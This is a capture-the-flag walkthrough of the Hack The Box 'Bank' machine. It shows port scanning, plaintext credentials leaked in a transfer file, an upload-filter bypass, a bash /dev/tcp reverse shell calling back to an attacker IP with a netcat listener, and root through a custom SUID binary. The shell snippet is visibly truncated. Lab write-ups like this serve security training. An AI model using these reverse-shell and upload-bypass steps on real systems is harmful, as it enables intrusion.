Machine Information
- Platform: Linux
- Difficulty: Easy
- IP Address: 10.129.29.200
Initial Enumeration
Nmap Scan
attacker@kali
attacker@kali:~$
nmap -sT -p- --min-rate 5000 10.129.29.200
Nmap Port Scan
$
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-09 17:44 CDT
Nmap scan report for 10.129.29.200
Host is up (0.0087s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
Detailed Service Scan
attacker@kali
attacker@kali:~$
nmap -sV -sC -p 22,53,80 10.129.29.200
Nmap Service Scan Results
Collapsible Output
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA) | 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA) 53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.7 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The presence of DNS (port 53) suggests we should enumerate DNS records.
Service Enumeration
DNS Enumeration
Since port 53 is open, I added the IP to /etc/hosts with the domain bank.htb:
/etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
10.129.29.200 bank.htb
Web Application
Navigating to http://bank.htb reveals a banking application with a login portal.
Important Discovery
Without adding
bank.htb to /etc/hosts, visiting http://10.129.29.200 shows only the default Apache page. The web application uses virtual hosting and requires the proper hostname.Directory Enumeration
attacker@kali
attacker@kali:~$
gobuster dir -u http://bank.htb/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
Gobuster Directory Enumeration
Collapsible Output
=============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://bank.htb/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt =============================================================== Starting gobuster in directory enumeration mode =============================================================== /uploads (Status: 301) [Size: 305] [--> http://bank.htb/uploads/] /assets (Status: 301) [Size: 304] [--> http://bank.htb/assets/] /inc (Status: 301) [Size: 301] [--> http://bank.htb/inc/] /balance-transfer (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/] /server-status (Status: 403) [Size: 288] ===============================================================
Balance Transfer Directory
The /balance-transfer/ directory contains hundreds of encrypted account transfer files. Most files are around 584 bytes, but sorting by size reveals one file that’s only 257 bytes - significantly smaller than the rest.
68576f20e9732f1b2edc4df5b8533230.acc
$
++OK ENCRYPT SUCCESS
+=================+
| HTB Bank Report |
+=================+
===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
This file wasn’t properly encrypted and contains credentials in plaintext!
Credentials: chris@bank.htb:!##HTBB4nkP4ssw0rd!##
Exploitation
File Upload Vulnerability
After logging in with the discovered credentials, I found a Support page that allows ticket creation with file attachments.
Attempting to upload a PHP reverse shell directly fails with “Only image files are allowed”. However, examining the page source reveals an interesting comment:
HTML Source Comment
<!-- [DEBUG] I added .htb extension for testing purposes. Uncomment it to let your name to display as a debugging resource.
TODO: Fix later. Erase this line. -->
This suggests that .htb files might bypass the upload filter!
Creating Reverse Shell
attacker@kali
attacker@kali:~$
# Create PHP reverse shell with .htb extension
cat > shell.htb << 'EOF'
& /dev/tcp/10.10.15.254/4444 0>&1'");
?>
EOF
I uploaded shell.htb through the support ticket system. The file was successfully uploaded to /uploads/shell.htb.
Triggering the Shell
attacker@kali
attacker@kali:~$
# Start netcat listener
nc -nvlp 4444
Navigate to: http://bank.htb/uploads/shell.htb
Reverse Shell Connection
$
listening on [any] 4444 ...
connect to [10.10.15.254] from (UNKNOWN) [10.129.235.70] 53980
whoami
www-data
ls -la /home
total 12
drwxr-xr-x 3 root root 4096 May 28 2017 .
drwxr-xr-x 22 root root 4096 Jan 11 2021 ..
drwxr-xr-x 3 chris chris 4096 May 29 2017 chris
Post-Exploitation Enumeration
SUID Binary Discovery
Shell
www-data@bank
find / -perm -4000 2>/dev/null
SUID Binary Search Results
Collapsible Output
/var/htb/bin/emergency /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/policykit-1/polkit-agent-helper-1 /usr/bin/at /usr/bin/chsh /usr/bin/passwd /usr/bin/chfn /usr/bin/pkexec /usr/bin/newgrp /usr/bin/traceroute6.iputils /usr/bin/gpasswd /usr/bin/sudo /usr/bin/mtr /usr/sbin/uuidd /usr/sbin/pppd /bin/ping /bin/ping6 /bin/su /bin/fusermount /bin/mount /bin/umount
The custom SUID binary /var/htb/bin/emergency stands out - it’s not a standard system binary.
Shell
www-data@bank
file /var/htb/bin/emergency
File Information
$
/var/htb/bin/emergency: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.24,
BuildID[sha1]=1fff1896e5f8db5be4db7b7ebab6ee176129b399, stripped
Privilege Escalation
Exploiting SUID Binary
Shell
www-data@bank
/var/htb/bin/emergency
Root Shell Obtained
$
# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# whoami
root
# cd /root
# ls -la
total 36
drwx------ 4 root root 4096 Oct 10 17:59 .
drwxr-xr-x 22 root root 4096 Jan 11 2021 ..
lrwxrwxrwx 1 root root 9 Jan 11 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3110 May 30 2017 .bashrc
drwx------ 2 root root 4096 Jan 11 2021 .cache
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
drwxr-xr-x 2 root root 4096 Jan 11 2021 .rpmdb
-rw-r--r-- 1 root root 66 May 29 2017 .selected_editor
-rw------- 1 root root 598 Jan 11 2021 .viminfo
-r-------- 1 root root 33 Oct 10 17:59 root.txt
ROOT FLAG
HTB
81e01ea258237dcc6cf4acd1ab971535
Root Shell Obtained
The
/var/htb/bin/emergency binary drops us directly into a root shell! The SUID bit combined with the binary’s functionality gives us euid=0(root).Loot
Credentials
Bank Web Portal
Username:
chris@bank.htbPassword:
!##HTBB4nkP4ssw0rd!##Host:
bank.htbNotes:
Found in unencrypted balance transfer file 68576f20e9732f1b2edc4df5b8533230.acc
Key Takeaways
- DNS enumeration is critical - without adding
bank.htbto/etc/hosts, the web application wouldn’t have been accessible - Sort by file size when investigating directories with many files - anomalies often reveal sensitive data
- HTML source comments can leak debugging information and alternative upload methods (
.htbextension) - Custom SUID binaries in non-standard locations (
/var/htb/bin/) should always be investigated for privilege escalation - File upload filters based solely on extension checking can be bypassed with allowed extensions like
.htb